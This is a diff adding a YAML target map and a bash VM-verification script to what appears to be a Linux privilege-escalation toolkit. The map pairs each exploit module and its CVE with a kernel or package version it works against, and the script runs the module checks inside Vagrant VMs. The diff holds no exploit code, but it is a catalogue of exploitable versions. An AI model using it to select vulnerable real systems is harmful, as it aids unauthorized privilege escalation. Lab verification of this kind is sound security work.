+#   ubuntu2004  — Ubuntu 20.04 LTS  (5.4.0 stock; HWE up to 5.15)
+#   ubuntu2204  — Ubuntu 22.04 LTS  (5.15.0 stock; HWE up to 6.5)
+#
+# Adding a new target: pick the oldest LTS box whose stock or HWE kernel
+# is below the module's kernel_range fix threshold; if no LTS works,
+# install a pinned kernel from kernel.ubuntu.com / snapshot.debian.org
+# via the kernel_pkg field.
+#
+# Modules where no fully-automatic vulnerable target exists (need manual
+# kernel build or a special distro variant) are marked manual: true with
+# a comment explaining the constraint.
+
+af_packet:
+  box: ubuntu1804
+  kernel_pkg: ""              # stock 4.15.0-213-generic — patch backported
+  kernel_version: "4.15.0"
+  expect_detect: OK
+  notes: "CVE-2017-7308; bug fixed mainline 4.10.6 + 4.9.18 backports. Ubuntu 18.04 stock kernel (4.15.0) is post-fix — detect() correctly returns OK. To validate the VULNERABLE path empirically would need a hand-built 4.4 or earlier kernel; deferred."
+
+af_packet2:
+  box: ubuntu2004
+  kernel_pkg: linux-image-5.4.0-26-generic
+  kernel_version: "5.4.0-26"
+  expect_detect: VULNERABLE
+  notes: "CVE-2020-14386; fixed in 5.9 mainline + backports; 5.4.0-26 (Ubuntu 20.04 launch) is pre-fix."
+
+af_unix_gc:
+  box: ubuntu2204
+  kernel_pkg: ""
+  mainline_version: "5.15.5"  # kernel.ubuntu.com/mainline/v5.15.5/ — below 5.15.130 backport
+  kernel_version: "5.15.5"
+  expect_detect: VULNERABLE
+  notes: "CVE-2023-4622; fix mainline 6.5 + backports 5.15.130/6.1.51/etc. Mainline 5.15.5 (Nov 2021) predates all backports and any silent distro patching. Installed via kernel.ubuntu.com/mainline/v5.15.5/."
+
+cgroup_release_agent:
+  box: debian11
+  kernel_pkg: ""              # 5.10.0 stock is pre-fix (fix 5.17)
+  kernel_version: "5.10.0"
+  expect_detect: VULNERABLE
+  notes: "CVE-2022-0492; fix landed 5.17 mainline + 5.16.9 stable; 5.10.0 is below."
+
+cls_route4:
+  box: ubuntu2004
+  kernel_pkg: linux-image-5.15.0-43-generic
+  kernel_version: "5.15.0-43"
+  expect_detect: VULNERABLE
+  notes: "CVE-2022-2588; fix landed 5.19 / backports 5.10.143 / 5.15.67; 5.15.0-43 is below."
+
+dirty_cow:
+  box: ubuntu1804
+  kernel_pkg: ""              # 4.15.0 has the COW race fix; need older kernel
+  kernel_version: "4.4.0"
+  expect_detect: OK
+  notes: "CVE-2016-5195; ALL 4.4+ kernels have the fix backported. Ubuntu 18.04 stock will report OK (patched); to actually verify exploit() needs Ubuntu 14.04 / kernel ≤ 4.4.0-46. Use a custom box for that."
+  manual_for_exploit_verify: true
+
+dirty_pipe:
+  box: ubuntu2204
+  kernel_pkg: ""              # 22.04 stock 5.15.0-91-generic
+  kernel_version: "5.15.0"
+  expect_detect: OK
+  notes: "CVE-2022-0847; introduced 5.8, fixed 5.16.11 / 5.15.25. Ubuntu 22.04 ships 5.15.0-91-generic, where uname reports '5.15.0' (below the 5.15.25 backport per our version-only table) but Ubuntu has silently backported the fix into the -91 patch level. Version-only detect() would say VULNERABLE; --active probe confirms the primitive is blocked → OK. This target validates the active-probe path correctly overruling a false-positive version verdict. (Originally pointed at Ubuntu 20.04 + pinned 5.13.0-19, but that HWE kernel is no longer in 20.04's apt archive.)"
+
+dirtydecrypt:
+  box: debian12
+  kernel_pkg: ""              # only Linux 7.0+ has the bug — needs custom kernel
+  kernel_version: "7.0.0"
+  expect_detect: OK
+  notes: "CVE-2026-31635; bug introduced in 7.0 rxgk path. NO mainline 7.0 distro shipping yet — Debian 12 will report OK (predates the bug). Verifying exploit() needs a hand-built 7.0-rc kernel."
+  manual_for_exploit_verify: true
+
+entrybleed:
+  box: ubuntu2204
+  kernel_pkg: ""              # any KPTI-enabled x86_64 kernel
+  kernel_version: "5.15.0"
+  expect_detect: VULNERABLE
+  notes: "CVE-2023-0458; side-channel applies to any KPTI-on Intel x86_64 host. Stock Ubuntu 22.04 will report VULNERABLE if meltdown sysfs shows 'Mitigation: PTI'."
+
+fragnesia:
+  box: debian12
+  kernel_pkg: ""
+  kernel_version: "7.0.0"
+  expect_detect: OK
+  notes: "CVE-2026-46300; XFRM ESP-in-TCP bug. Needs 7.0-rc; Debian 12 reports OK."
+  manual_for_exploit_verify: true
+
+fuse_legacy:
+  box: debian11
+  kernel_pkg: ""              # 5.10.0 is pre-fix (fix 5.16)
+  kernel_version: "5.10.0"
+  expect_detect: VULNERABLE
+  notes: "CVE-2022-0185; fix 5.16.2 mainline + 5.10.93 stable; Debian 11 stock 5.10.0 is below."
+
+netfilter_xtcompat:
+  box: debian11
+  kernel_pkg: ""              # 5.10.0 (Debian 11 stock) is pre-fix (fix 5.13 + 5.10.46)
+  kernel_version: "5.10.0"
+  expect_detect: VULNERABLE
+  notes: "CVE-2021-22555; 15-year-old bug; Debian 11 stock 5.10.0 below the 5.10.38 fix backport."
+
+nf_tables:
+  box: ubuntu2204
+  kernel_pkg: ""
+  mainline_version: "5.15.5"
+  kernel_version: "5.15.5"
+  expect_detect: VULNERABLE
+  notes: "CVE-2024-1086; bug introduced 5.14; fix mainline 6.8 + 5.15.149/6.1.74 backports. Mainline 5.15.5 (Nov 2021) is well below 5.15.149 — empirically vulnerable. Installed via kernel.ubuntu.com/mainline/v5.15.5/."
+
+nft_fwd_dup:
+  box: debian11
+  kernel_pkg: ""              # 5.10.0 below the 5.10.103 backport
+  kernel_version: "5.10.0"
+  expect_detect: VULNERABLE
+  notes: "CVE-2022-25636; fix 5.17 mainline + 5.10.103 backport; Debian 11 stock 5.10.0 below."
+
+nft_payload:
+  box: ubuntu2004
+  kernel_pkg: linux-image-5.15.0-43-generic
+  kernel_version: "5.15.0-43"
+  expect_detect: VULNERABLE
+  notes: "CVE-2023-0179; fix 6.2 mainline + 5.15.91 / 5.10.162 backports; 5.15.0-43 is below."
+
+nft_set_uaf:
+  box: ubuntu2204
+  kernel_pkg: ""
+  mainline_version: "5.15.5"
+  kernel_version: "5.15.5"
+  expect_detect: VULNERABLE
+  notes: "CVE-2023-32233; bug introduced 5.1; fix mainline 6.4-rc4 + 6.1.27/5.15.110 backports. Mainline 5.15.5 (Nov 2021) is below 5.15.110 — empirically vulnerable. Installed via kernel.ubuntu.com/mainline/v5.15.5/."
+
+overlayfs:
+  box: ubuntu2004
+  kernel_pkg: ""              # Ubuntu-specific bug; stock 5.4 is pre-fix
+  kernel_version: "5.4.0"
+  expect_detect: VULNERABLE
+  notes: "CVE-2021-3493; Ubuntu-specific overlayfs userns capability injection. Stock 5.4.0 in Ubuntu 20.04 is below the fixed package."
+
+overlayfs_setuid:
+  box: ubuntu2204
+  kernel_pkg: ""              # 5.15.0 stock is pre-fix (5.15.110 backport)
+  kernel_version: "5.15.0"
+  expect_detect: VULNERABLE
+  notes: "CVE-2023-0386; fix 6.3 + 6.1.11 / 5.15.110 / 5.10.179; 5.15.0 stock is below."
+
+pack2theroot:
+  box: debian12
+  kernel_pkg: ""              # PackageKit-version bug, not kernel
+  kernel_version: "6.1.0"
+  expect_detect: PRECOND_FAIL
+  notes: "CVE-2026-41651; needs PackageKit ≤ 1.3.5 + polkit + an active D-Bus session bus. Debian 12's generic cloud image is server-oriented and does NOT install PackageKit (the bug's target daemon), so detect() correctly returns PRECOND_FAIL ('PackageKit daemon not registered on the system bus'). To validate the VULNERABLE path empirically, install packagekit in the VM before verifying ('apt install -y packagekit' + 'systemctl start packagekit'); deferred to a follow-up provisioner."
+
+ptrace_traceme:
+  box: ubuntu1804
+  kernel_pkg: ""              # 4.15.0 stock is below the 5.1.17 fix
+  kernel_version: "4.15.0"
+  expect_detect: VULNERABLE
+  notes: "CVE-2019-13272; fix 5.1.17 mainline; Ubuntu 18.04 stock 4.15 is below."
+
+pwnkit:
+  box: ubuntu2004
+  kernel_pkg: ""              # polkit 0.105 ships in Ubuntu 20.04 → vulnerable
+  kernel_version: "5.4.0"
+  expect_detect: VULNERABLE
+  notes: "CVE-2021-4034; polkit ≤ 0.120 vulnerable. Ubuntu 20.04 ships polkit 0.105."
+
+sequoia:
+  box: ubuntu2004
+  kernel_pkg: linux-image-5.4.0-26-generic
+  kernel_version: "5.4.0-26"
+  expect_detect: VULNERABLE
+  notes: "CVE-2021-33909; fix 5.13.4 / 5.10.52 / 5.4.135; 5.4.0-26 is below."
+
+stackrot:
+  box: ubuntu2204
+  kernel_pkg: ""
+  mainline_version: "6.1.10"  # below the 6.1.37 backport
+  kernel_version: "6.1.10"
+  expect_detect: VULNERABLE
+  notes: "CVE-2023-3269; bug introduced 6.1; fix mainline 6.4 + 6.1.37/6.3.10 backports. Mainline 6.1.10 (Feb 2023) is below 6.1.37 — empirically vulnerable. Installed via kernel.ubuntu.com/mainline/v6.1.10/."
+
+sudo_samedit:
+  box: ubuntu1804
+  kernel_pkg: ""              # ubuntu 18.04 ships sudo 1.8.21 — vulnerable to 1.9.5p1
+  kernel_version: "4.15.0"
+  expect_detect: VULNERABLE
+  notes: "CVE-2021-3156; sudo 1.8.21 vulnerable; Ubuntu 18.04 ships 1.8.21p2."
+
+sudoedit_editor:
+  box: ubuntu2204
+  kernel_pkg: ""              # sudo 1.9.9 in Ubuntu 22.04 is vulnerable
+  kernel_version: "5.15.0"
+  expect_detect: PRECOND_FAIL
+  notes: "CVE-2023-22809; sudo ≤ 1.9.12p2 vulnerable, Ubuntu 22.04 ships 1.9.9 — version-wise vulnerable. BUT the default Vagrant 'vagrant' user has no sudoedit grant in /etc/sudoers, so detect() short-circuits to PRECOND_FAIL ('vuln version present, no grant to abuse'). This is correct and documented behaviour. To validate the VULNERABLE-by-version path empirically, provision a sudoers grant (e.g. `vagrant ALL=(ALL) sudoedit /tmp/probe`) before verifying — currently the Vagrantfile doesn't."
+
+vmwgfx:
+  box: ""                     # vmware-guest only; no useful Vagrant box
+  kernel_pkg: ""
+  kernel_version: ""
+  expect_detect: PRECOND_FAIL
+  notes: "CVE-2023-2008; vmwgfx DRM only reachable on VMware guests. No Vagrant box; verify manually inside a VMware VM with a vulnerable kernel (e.g. Debian 11 / 5.10.0)."
+  manual: true
@@ -0,0 +1,215 @@
+#!/usr/bin/env bash
+# tools/verify-vm/verify.sh — verify ONE module in the right pre-built VM.
+#
+# Usage:
+#   verify.sh <module>           # provision, run --explain --active, suspend VM
+#   verify.sh <module> --keep    # keep VM running after for inspection
+#   verify.sh <module> --destroy # destroy VM after (full reset; slow next run)
+#   verify.sh --list             # show every module + the box it's mapped to
+#
+# What it does:
+#   1. Reads tools/verify-vm/targets.yaml: <module> -> (box, kernel_pkg, kver,
+#      expect_detect).
+#   2. Sets SKK_VM_* env vars + spins up the right Vagrant VM.
+#   3. If a kernel pin is needed, installs it + reboots the VM.
+#   4. Runs `skeletonkey --explain <module> --active` inside the VM via
+#      `vagrant provision --provision-with build-and-verify`.
+#   5. Captures stdout, parses the VERDICT line, compares against expect_detect.
+#   6. Emits a JSON verification record on stdout (timestamped) suitable for
+#      piping into the per-module verified-on table (separate follow-up).
+#
+# Requirements:
+#   - tools/verify-vm/setup.sh has been run successfully (Vagrant +
+#     vagrant-parallels + boxes cached).
+#   - Module name matches a key in targets.yaml.
+
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/../.." && pwd)"
+VM_DIR="$REPO_ROOT/tools/verify-vm"
+TARGETS="$VM_DIR/targets.yaml"
+LOG_DIR="$VM_DIR/logs"
+mkdir -p "$LOG_DIR"
+
+# Minimal YAML field reader for targets.yaml's flat 2-level structure.
+# Usage: yget <module> <field>
+#   yget af_packet box           -> "ubuntu1804"
+# Strips surrounding quotes and trailing whitespace; empty fields -> "".
+yget() {
+    local module="$1"
+    local field="$2"
+    awk -v m="${module}:" -v f="  ${field}:" '
+        $0 ~ "^"m"[[:space:]]*$"   { inmod=1; next }
+        inmod && /^[a-zA-Z]/        { inmod=0 }   # next top-level key
+        inmod && $0 ~ "^"f          {
+            sub("^[^:]+:[[:space:]]*", "")
+            sub("[[:space:]]+#.*$",  "")          # trim trailing comment
+            sub("^\"", ""); sub("\"$", "")
+            print; exit
+        }
+    ' "$TARGETS"
+}
+
+# ── arg parsing ───────────────────────────────────────────────────────────
+KEEP=0; DESTROY=0; LIST=0; MODULE=""
+while [[ $# -gt 0 ]]; do
+    case "$1" in
+        --keep)     KEEP=1 ;;
+        --destroy)  DESTROY=1 ;;
+        --list)     LIST=1 ;;
+        -h|--help)
+            sed -n '1,30p' "$0"; exit 0 ;;
+        --*)
+            echo "[-] unknown flag: $1" >&2; exit 2 ;;
+        *)
+            MODULE="$1" ;;
+    esac
+    shift
+done
+
+# ── --list mode ───────────────────────────────────────────────────────────
+if [[ $LIST -eq 1 ]]; then
+    printf "%-22s %-14s %-18s %-14s %s\n" "MODULE" "BOX" "KERNEL" "EXPECT" "NOTES"
+    printf "%-22s %-14s %-18s %-14s %s\n" "------" "---" "------" "------" "-----"
+    # Iterate top-level keys (lines starting in column 0 with `something:`).
+    awk '/^[a-z_][a-zA-Z0-9_]*:[[:space:]]*$/ { sub(":", ""); print }' "$TARGETS" | \
+    while read -r mod; do
+        box=$(yget "$mod" box)
+        kv=$(yget "$mod" kernel_version)
+        exp=$(yget "$mod" expect_detect)
+        notes=$(yget "$mod" notes | head -c 60)
+        [[ -z "$box" ]] && box="(manual)"
+        [[ -z "$kv"  ]] && kv="stock"
+        [[ -z "$exp" ]] && exp="?"
+        printf "%-22s %-14s %-18s %-14s %s\n" "$mod" "$box" "$kv" "$exp" "$notes"
+    done
+    exit 0
+fi
+
+if [[ -z "$MODULE" ]]; then
+    echo "[-] usage: verify.sh <module> [--keep|--destroy]"
+    echo "    verify.sh --list   # show all targets"
+    exit 2
+fi
+
+# ── load target ───────────────────────────────────────────────────────────
+BOX=$(yget "$MODULE" box)
+KERNEL_PKG=$(yget "$MODULE" kernel_pkg)
+MAINLINE=$(yget "$MODULE" mainline_version)
+KERNEL_VER=$(yget "$MODULE" kernel_version)
+EXPECT=$(yget "$MODULE" expect_detect)
+MANUAL=$(yget "$MODULE" manual)
+NOTES=$(yget "$MODULE" notes)
+
+if ! grep -q "^${MODULE}:" "$TARGETS"; then
+    echo "[-] module not in targets.yaml: $MODULE" >&2
+    exit 3
+fi
+if [[ "$MANUAL" == "true" || -z "$BOX" ]]; then
+    echo "[-] $MODULE is marked manual: true (${NOTES:0:80})" >&2
+    exit 4
+fi
+BOX="generic/$BOX"
+VM_HOSTNAME="skk-${MODULE}"
+SHORT_NOTES="${NOTES:0:80}"
+
+# ── kick off provisioning ─────────────────────────────────────────────────
+echo
+echo "════════════════════════════════════════════════════"
+echo " SKELETONKEY VM verifier: $MODULE"
+echo "════════════════════════════════════════════════════"
+echo "  box:         $BOX"
+echo "  kernel:      ${KERNEL_PKG:-(stock)}  → $KERNEL_VER"
+echo "  expect:      $EXPECT"
+echo "  notes:       $SHORT_NOTES"
+echo
+
+cd "$VM_DIR"
+export SKK_VM_BOX="$BOX"
+export SKK_VM_KERNEL_PKG="$KERNEL_PKG"
+export SKK_VM_MAINLINE_VERSION="$MAINLINE"
+export SKK_VM_KERNEL_VERSION="$KERNEL_VER"
+export SKK_VM_HOSTNAME="$VM_HOSTNAME"
+export SKK_MODULE="$MODULE"
+export VAGRANT_VAGRANTFILE="$VM_DIR/Vagrantfile"
+
+# Spin up if not running.
+if ! vagrant status "$VM_HOSTNAME" 2>&1 | grep -q "running"; then
+    echo "[*] vagrant up..."
+    vagrant up "$VM_HOSTNAME" --provider=parallels
+fi
+
+# Reboot if any kernel pin was applied (uname -r != target).
+if [[ -n "$KERNEL_PKG" || -n "$MAINLINE" ]]; then
+    current_kver=$(vagrant ssh "$VM_HOSTNAME" -c "uname -r" 2>/dev/null | tr -d '\r')
+    target_match="$KERNEL_VER"
+    [[ -n "$MAINLINE" ]] && target_match="$MAINLINE"
+    if [[ "$current_kver" != *"$target_match"* ]]; then
+        echo "[*] current kernel $current_kver != target $target_match; rebooting..."
+        vagrant reload "$VM_HOSTNAME"
+        sleep 5
+    fi
+fi
+
+# Run the explain probe.
+LOG="$LOG_DIR/verify-${MODULE}-$(date +%Y%m%d-%H%M%S).log"
+
+# Force rsync the source tree in. vagrant up runs rsync automatically on
+# first up but NOT on a resume/already-running VM, so we always rsync here
+# to guarantee /vagrant/ inside the guest matches the host's source tree.
+echo "[*] syncing source into VM..."
+vagrant rsync "$VM_HOSTNAME" 2>&1 | tail -5
+
+echo "[*] running verifier..."
+vagrant provision "$VM_HOSTNAME" --provision-with build-and-verify 2>&1 | tee "$LOG"
+
+# Parse verdict. Vagrant prefixes provisioner output with the VM name
+# (e.g. "    skk-pwnkit: VERDICT: VULNERABLE"), so anchor on the VERDICT
+# keyword itself. `|| true` keeps pipefail+set-e from killing us on miss.
+VERDICT=$(grep -E "VERDICT:" "$LOG" | tail -1 | awk '{print $NF}' || true)
+[[ -z "$VERDICT" ]] && VERDICT="?"
+
+# Compare.
+if [[ "$VERDICT" == "$EXPECT" ]]; then
+    STATUS=match
+else
+    STATUS=MISMATCH
+fi
+
+# Verification record (JSON).
+NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)
+HOST_KVER=$(vagrant ssh "$VM_HOSTNAME" -c "uname -r" 2>/dev/null | tr -d '\r')
+HOST_DISTRO=$(vagrant ssh "$VM_HOSTNAME" -c \
+    "(. /etc/os-release && echo \"\$PRETTY_NAME\")" 2>/dev/null | tr -d '\r')
+
+echo
+echo "════════════════════════════════════════════════════"
+echo " Verification record"
+echo "════════════════════════════════════════════════════"
+RECORD=$(cat <<JSON
+{"module":"$MODULE","verified_at":"$NOW","host_kernel":"$HOST_KVER","host_distro":"$HOST_DISTRO","vm_box":"$BOX","expect_detect":"$EXPECT","actual_detect":"$VERDICT","status":"$STATUS"}
+JSON
+)
+printf '%s\n' "$RECORD" | python3 -m json.tool 2>/dev/null || printf '%s\n' "$RECORD"
+
+# Append to the permanent JSONL store (one record per line, dedup happens
+# at refresh time in tools/refresh-verifications.py).
+echo "$RECORD" >> "$REPO_ROOT/docs/VERIFICATIONS.jsonl"
+echo
+echo "[i] appended to docs/VERIFICATIONS.jsonl"
+echo "[i] run 'tools/refresh-verifications.py' to regenerate core/verifications.c"
+echo
+
+# Lifecycle.
+if [[ $DESTROY -eq 1 ]]; then
+    echo "[*] --destroy: tearing down VM..."
+    vagrant destroy -f "$VM_HOSTNAME"
+elif [[ $KEEP -eq 1 ]]; then
+    echo "[i] --keep: VM left running. Reconnect with:"
+    echo "    cd tools/verify-vm && vagrant ssh $VM_HOSTNAME"
+else
+    echo "[*] suspending VM (resume next time)..."
+    vagrant suspend "$VM_HOSTNAME"
+fi
+
+[[ "$STATUS" == "match" ]] && exit 0 || exit 5